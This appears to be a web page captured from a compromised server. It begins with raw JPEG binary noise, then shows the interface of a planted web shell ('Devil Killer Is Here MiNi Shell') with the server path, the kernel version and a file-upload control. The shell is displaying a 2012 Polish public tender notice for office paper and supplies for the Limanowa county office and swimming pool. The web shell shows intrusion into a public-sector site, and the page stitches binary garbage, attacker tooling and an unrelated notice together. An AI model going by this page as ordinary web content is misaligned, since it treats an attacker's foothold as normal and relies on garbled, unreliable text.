JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120202/32310-N-2012.html

<p class="kh_header"><b>Limanowa: Dostawa papieru ksero oraz materiałów biurowych na potrzeby Starostwa Powiatowego w Limanowej</b><br>
<b>Numer ogłoszenia: 32310 - 2012; data zamieszczenia: 02.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Limanowej , ul. Józefa Marka 9, 34-600 Limanowa, woj. małopolskie, tel. 18 33 37 800, faks 18 33 37 880.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.limanowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa papieru ksero oraz materiałów biurowych na potrzeby Starostwa Powiatowego w Limanowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa papieru ksero oraz materiałów biurowych na potrzeby Starostwa Powiatowego w Limanowej z podziałem na 4 zadania częściowe..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.20.00-1, 30.19.70.00-6, 30.19.95.00-5, 30.19.92.30-1, 22.81.00.00-1, 22.60.00.00-6, 22.80.00.00-8, 30.19.94.10-7, 22.99.00.00-6, 30.19.00.00-7, 22.90.00.00-9, 30.19.76.20-8, 30.19.76.30-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie jest przewidziane składanie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Na potwierdzenie spełniania w/w warunku Wykonawca przedłoży oświadczenie z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże w przedłożonym do oferty wykazie dostaw, że w okresie ostatnich trzech lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentów potwierdzających, że te dostawy zostały wykonane należycie), wykonał, co najmniej 2 dostawy:
1.	papieru w przypadku składania oferty na zadanie częściowe nr 1 i 2,
2.	artykułów biurowych w przypadku składania oferty na zadanie częściowe nr 3 i 4,
Spełnienie warunku Wykonawca wykaże przedkładając wykaz dostaw wraz z dokumentami potwierdzającymi, że wykazane dostawy zostały wykonane należycie (tj. z treści dokumentu musi wynikać, że dostawa została wykonana należycie).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Na potwierdzenie spełniania w/w warunku Wykonawca przedłoży oświadczenie z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Na potwierdzenie spełniania w/w warunku Wykonawca przedłoży oświadczenie z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.
Na potwierdzenie spełniania w/w warunku Wykonawca przedłoży oświadczenie z art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pełnomocnictwo, jeżeli Wykonawcę reprezentuje pełnomocnik. Pełnomocnictwo powinno być złożone w oryginale lub w formie kopii poświadczonej za zgodność z oryginałem przez notariusza.
2) Kalkulacja cenowa - zadanie 1: Uzupełniona kalkulacja cenowa w przypadku składania oferty na zadanie częściowe nr 1,
3) Kalkulacja cenowa - zadanie 2: Uzupełniona kalkulacja cenowa w przypadku składania oferty na zadanie częściowe nr 2,
4) Kalkulacja cenowa - zadanie 3: Uzupełniona kalkulacja cenowa w przypadku składania oferty na zadanie częściowe nr 3,
5) Kalkulacja cenowa - zadanie 4: Uzupełniona kalkulacja cenowa w przypadku składania oferty na zadanie częściowe nr 4</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana istotnych postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany. Zmiany umowy nie mogą wykraczać poza zakres świadczenia określony w SIWZ. Zamawiający przewiduje następujące zmiany istotnych postanowień umowy:
1)	Zmiana terminu dostawy poszczególnej partii jest możliwa w przypadku:
a) zmian spowodowanych warunkami atmosferycznymi, w szczególności klęskami żywiołowymi, uniemożliwiającymi dostarczenie przedmiotu zamówienia, 
b) innych przyczyn zewnętrznych niezależnych od Zamawiającego i Wykonawcy, skutkujących niemożliwością wykonywania czynności przewidzianych umową, 
2) Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
a) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ,
b) zmianie uległy przepisy prawne istotne dla realizacji przedmiotu umowy, 
c) ustawowa zmiana stawki podatku VAT, Zamawiający przewiduje możliwość zmiany wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT,
d) zmiany zapisów umowy będących wynikiem realizacji przez Zamawiającego uprawnień z tytułu rękojmi lub gwarancji na dostarczony przedmiot zamówienia,
e) zmiany dotyczące nazwy, siedziby Wykonawcy lub jego formy organizacyjno - prawnej w trakcie trwania umowy, numerów kont bankowych oraz innych danych identyfikacyjnych,
f) zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy,
g) zmiana miejsca dostawy,
h) polepszenie parametrów technicznych, jakościowych, użytkowych i estetycznych dostawy,
i) poprawienie sprawności, wydajności lub innego zwiększenia wartości dostawy dla zamawiającego,
j) poprawienie warunków gwarancji,
k) aktualizacja rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów.
2. Dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania. Takimi zmianami są zmiany o charakterze administracyjno - organizacyjnym umowy np. zmiana nr konta bankowego, dotycząc nazwy, siedziby Wykonawcy lub jego formy organizacyjno - prawnej w trakcie trwania umowy, innych danych identyfikacyjnych, zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy.
3. Zmiany do umowy może inicjować zarówno Zamawiający jak i Wykonawca, składając pisemny wniosek do drugiej strony, zawierający w szczególności opis zmiany i jej uzasadnienie. Zamawiający przewiduje katalog zmian, na które może wyrazić zgodę, powyższe nie stanowi jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://przetargi.propublico.pl/ZamawiajacySzczegoly.aspx?id=178<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, pokój nr 233, II piętro, budynek B.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2012 godzina 11:00, miejsce: w siedzibie Zamawiającego, pokój nr: Kancelaria Ogólna, I piętro, budynek B, Godziny pracy Kancelarii: od poniedziałku do piątku od 7:30 do 15:30 do dnia 2012-02-10 do godz. 11:00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa papieru ksero na potrzeby Starostwa Powiatowego w Limanowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa na potrzeby Starostwa Powiatowego w Limanowej:
1. papieru uniwersalnego, dostosowanego do  drukarek atramentowych i laserowych oraz kserokopiarek, niepowodujący zużycia urządzeń utrwalających oraz wszelkiego rodzaju wałków w drukarkach i ksero, pakowany w ryzach po 500 sztuk dla A2, A3, A4 oraz po 250 sztuk dla A1, o następujących parametrach: 
   1) Biały:
       a) gramatura co najmniej 80 +/- 3 g/m2,
       b) białość  co najmniej 161 +/- 3 CIE,
   2) Kolorowy:
       a) gramatura co najmniej 80 +/- 3 g/m2,
2. papieru białego standard bezpyłowego do ploterów o gramaturze co najmniej 90+/- 3 g/m2 pakowanego w rolkach po 50 mb.

Papier  winnien posiadać co najmniej jeden z poniższych certyfikatów:
1) Błękitny Anioł,
2) Certyfikat Rady Dobrej Gospodarki Leśnej (FSC),
3) BIO - produkt ekologiczny,
4) Fair Trade - Sprawiedliwy Handel,
5) Eco Garantie,
6) TÜV SÜD,
7) Nordycki Łabędź,
8) Europejska Stokrotka.

Papier będzie dostarczany partiami do budynku Starostwa Powiatowego w Limanowej ul. Józefa Marka 9, w miesięcznych odstępach czasowych lub w razie potrzeby na każde żądanie Zamawiającego, przez Wykonawcę, który jest zobowiązany do pokrycia wszystkich kosztów z tym związanych.
Rodzaj i ilość asortymentu w ramach dostarczonej partii poszczególnych towarów wskazuje Zamawiający mailowo lub faksem, na 7 dni przed dostawą, a w przypadku zamówień o charakterze nagłym na 2 dni przed terminem dostawy.
Przewidywane roczne zapotrzebowanie zostało wykazane w załączniku 1 do niniejszej specyfikacji (kalkulacja cenowa dla zadania częściowego nr 1).
Wskazane ilości są wielkościami szacunkowymi ustalonymi na podstawie zużycia w roku 2011 oraz przewidywanego zapotrzebowania dla okresu trwania umowy i mogą być niższe lub wyższe w poszczególnych asortymentach w zależności od bieżących potrzeb Zamawiającego. 
Wykonawca zobowiązuje się do elastycznego reagowania na zwiększone lub zmniejszone potrzeby Zamawiającego w stosunku do danego asortymentu (w granicach podpisanej kwoty umowy). 
Dostarczony asortyment towaru, do którego Zamawiający będzie mieć zastrzeżenia zostanie zwrócony Wykonawcy, który jest zobowiązany do wymiany na nowy na swój koszt. 
Zamawiający zastrzega sobie prawo do ograniczenia zakupu do wysokości posiadanych środków.
W przypadku zwiększenia zamówienia w okresie trwania umowy ceny za poszczególne produkty pozostają bez zmian..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.76.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa papieru ksero na potrzeby Krytej Pływalni w Limanowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa na potrzeby Krytej Pływalni w Limanowej papieru uniwersalnego, dostosowanego do drukarek atramentowych i laserowych oraz kserokopiarek, niepowodujący zużycia urządzeń utrwalających oraz wszelkiego rodzaju wałków w drukarkach i ksero, pakowany w ryzach po 500 sztuk, o następujących parametrach: 
   1) Biały:
       a) gramatura co najmniej 80 +/- 3 g/m2,
       b) białość  co najmniej 161 +/- 3 CIE,
   2) Kolorowy:
       a) gramatura co najmniej 80 +/- 3 g/m2,

Papier  winien posiadać co najmniej jeden z poniższych certyfikatów:
1) Błękitny Anioł,
2) Certyfikat Rady Dobrej Gospodarki Leśnej (FSC),
3) BIO - produkt ekologiczny,
4) Fair Trade - Sprawiedliwy Handel,
5) Eco Garantie,
6) TÜV SÜD,
7) Nordycki Łabędź,
8) Europejska Stokrotka.

Papier będzie dostarczany partiami do budynku Krytej Pływalni w Limanowej ul. Zygmunta Augusta 37, w miesięcznych odstępach czasowych lub w razie potrzeby na każde żądanie Zamawiającego, przez Wykonawcę, który jest zobowiązany do pokrycia wszystkich kosztów z tym związanych.
Rodzaj i ilość asortymentu w ramach dostarczonej partii poszczególnych towarów wskazuje Zamawiający mailowo lub faksem, na 7 dni przed dostawą, a w przypadku zamówień o charakterze nagłym na 2 dni przed terminem dostawy.
Przewidywane roczne zapotrzebowanie zostało wykazane w załączniku 2 do niniejszej specyfikacji (kalkulacja cenowa dla zadania częściowego nr 2). 
Wskazane ilości są wielkościami szacunkowymi ustalonymi na podstawie zużycia w roku 2011 oraz przewidywanego zapotrzebowania dla okresu trwania umowy i mogą być niższe lub wyższe w poszczególnych asortymentach w zależności od bieżących potrzeb Zamawiającego. 
Wykonawca zobowiązuje się do elastycznego reagowania na zwiększone lub zmniejszone potrzeby Zamawiającego w stosunku do danego asortymentu (w granicach podpisanej kwoty umowy). 
Dostarczony asortyment towaru, do którego Zamawiający będzie mieć zastrzeżenia zostanie zwrócony Wykonawcy, który jest zobowiązany do wymiany na nowy na swój koszt. 
Zamawiający zastrzega sobie prawo do ograniczenia zakupu do wysokości posiadanych środków.
W przypadku zwiększenia zamówienia w o.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 30.19.76.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa materiałów biurowych na potrzeby Starostwa Powiatowego w Limanowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa na potrzeby Starostwa Powiatowego w Limanowej fabrycznie nowych artykułów (materiałów) biurowych wg parametrów i w ilościach orientacyjnie określonych w załączniku nr 3 do niniejszej specyfikacji.
Zamawiający dopuszcza składanie ofert równoważnych.
Za równoważny Zamawiający uzna produkt o parametrach technicznych, jakościowych, użytkowych i estetycznych nie gorszych niż te, jakie posiada artykuł wskazany przez Zamawiającego.
W przypadku, gdy Wykonawca powołuje się na produkt równoważny, informacja o tym musi znaleźć się w ofercie. 
Artykuły biurowe będą dostarczane partiami do budynku Starostwa Powiatowego w Limanowej ul. Józefa Marka 9, w miesięcznych odstępach czasowych lub w razie potrzeby na każde żądanie Zamawiającego, przez Wykonawcę, który jest zobowiązany do pokrycia  wszystkich kosztów z tym związanych.
Rodzaj i ilość asortymentu w ramach dostarczonej partii poszczególnych towarów wskazuje Zamawiający mailowo lub faksem, na 7 dni przed dostawą, a w przypadku zamówień o charakterze nagłym na 2 dni przed terminem dostawy.
Przewidywane roczne zapotrzebowanie zostało wykazane w załączniku 3 do niniejszej specyfikacji (kalkulacja cenowa dla zadania częściowego nr 3). 
Wskazane ilości są wielkościami szacunkowymi ustalonymi na podstawie zużycia w roku 2011 oraz przewidywanego zapotrzebowania dla okresu trwania umowy i mogą być niższe lub wyższe w poszczególnych asortymentach w zależności od bieżących potrzeb Zamawiającego. 
Wykonawca zobowiązuje się do elastycznego reagowania na zwiększone lub zmniejszone potrzeby Zamawiającego w stosunku do danego asortymentu (w granicach podpisanej kwoty umowy). 
Zamawiający wymaga, aby dostarczany asortyment na produkcie lub opakowaniu był opatrzony nazwą- logiem producenta. 
Dostarczony asortyment towaru, do którego Zamawiający będzie mieć zastrzeżenia zostanie zwrócony Wykonawcy, który jest zobowiązany do wymiany na nowy na swój koszt. 
Zamawiający zastrzega sobie prawo do ograniczenia zakupu do wysokości posiadanych środków.
W przypadku zwiększenia zamówienia w okresie trwania umowy ceny za poszczególne produkty pozostają bez zmian..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6, 30.19.95.00-5, 30.19.92.30-1, 22.81.00.00-1, 22.60.00.00-6, 22.80.00.00-8, 30.19.94.10-7, 22.99.00.00-6, 30.19.00.00-7, 22.90.00.00-9, 30.19.76.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa materiałów biurowych na potrzeby Krytej Pływalni w Limanowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa na potrzeby Krytej Pływalni w Limanowej fabrycznie nowych artykułów (materiałów) biurowych wg parametrów i w ilościach orientacyjnie określonych w załączniku nr 4 do niniejszej specyfikacji.
Zamawiający dopuszcza składanie ofert równoważnych.
Za równoważny Zamawiający uzna produkt o parametrach technicznych, jakościowych, użytkowych i estetycznych nie gorszych niż te, jakie posiada artykuł wskazany przez Zamawiającego.
W przypadku, gdy Wykonawca powołuje się na produkt równoważny, informacja o tym musi znaleźć się w ofercie. 
